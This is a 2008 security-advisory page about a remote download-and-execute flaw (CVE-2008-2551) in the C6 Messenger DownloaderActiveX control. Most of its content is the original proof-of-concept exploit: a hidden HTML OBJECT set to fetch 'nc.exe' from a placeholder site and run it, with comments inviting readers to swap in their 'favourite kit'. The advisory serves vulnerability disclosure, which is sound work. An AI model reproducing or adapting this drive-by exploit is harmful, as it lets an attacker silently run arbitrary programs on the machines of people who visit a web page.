|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||||
SecurityAlert : 3926 CVE : CVE-2008-2551 CWE : CWE-264 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : Yes Exploit Available : Yes
Credit : Nine:Situations:Group Published : 07.06.2008
Advisory Content : <!-- C6 Messenger Installation Url DownloaderActiveX Control Remote Download & Execute Exploit by Nine:Situations:Group::SnoopyAssault site: http://retrogod.altervista.org/ exploit url: http://retrogod.altervista.org/9sg_c6_download_exec.html "C6 Messenger is an instant messaging program produced by Telecom Italia Group, specifically by Alice (distribution), Icon Spa (development, design and server) and Opendoc (graphics). It is the only instant messenger entirely produced in Italy, is a free program, allows you to chat in real time with friends[..]" installation urls: http://c6.community.alice.it/home/index.html http://c6.community.alice.it/download/c6.html Whoever accessed the second one with IE to install c6 IM is vulnerable to this threat. Notice that you can pass also local urls to "propDownloadUrl" property and bypass Internet zone, no host check is performed. "propPostDownloadAction" one is used to launch the executable. A progress bar is shown but you can easily make it not visible. settings: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data info: http://www.google.com/search?hl=en&q=c1b7e532-3ecb-4e9e-bb3a-2951ffe67c6 1&meta=&num=100&filter=0 Let me guess, this one is already exploited in the wild... Thanks Mommy Telecom Italia!! If you think this poc is useful, please help us to improve our equipment and donate through the paypal button on our site! ------------------------------------------------------------------------ -------- Goodbye rgod-tsid-pah he-ru-ka! --> <HTML> <BODY> <OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1"> <PARAM NAME="propProgressBackground" VALUE="#bccee8"> <PARAM NAME="propTextBackground" VALUE="#f7f8fc"> <PARAM NAME="propBarColor" VALUE="#df0203"> <PARAM NAME="propTextColor" VALUE="#000000"> <PARAM NAME="propWidth" VALUE="0"> <PARAM NAME="propHeight" VALUE="0"> <PARAM NAME="propDownloadUrl" VALUE="http://yoursite.com/nc.exe"><!-- change to your favourite kit ! :) --> <PARAM NAME="propPostDownloadAction" VALUE="run"> <!-- lol --> <PARAM NAME="propInstallCompleteUrl" VALUE=""> <PARAM NAME="propBrowserRedirectUrl" VALUE=""> <PARAM NAME="propVerbose" VALUE="0"> <PARAM NAME="propInterrupt" VALUE="0"> </OBJECT> </BODY> </HTML> References : http://securityreason.com/expldownload/1/4024/1 (Exploit) http://xforce.iss.net/xforce/xfdb/42825
http://www.securityfocus.com/archive/1/archive/1/493019/100/0/threaded
http://www.milw0rm.com/exploits/5732
http://www.frsirt.com/english/advisories/2008/1733/references
http://secunia.com/advisories/30512  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |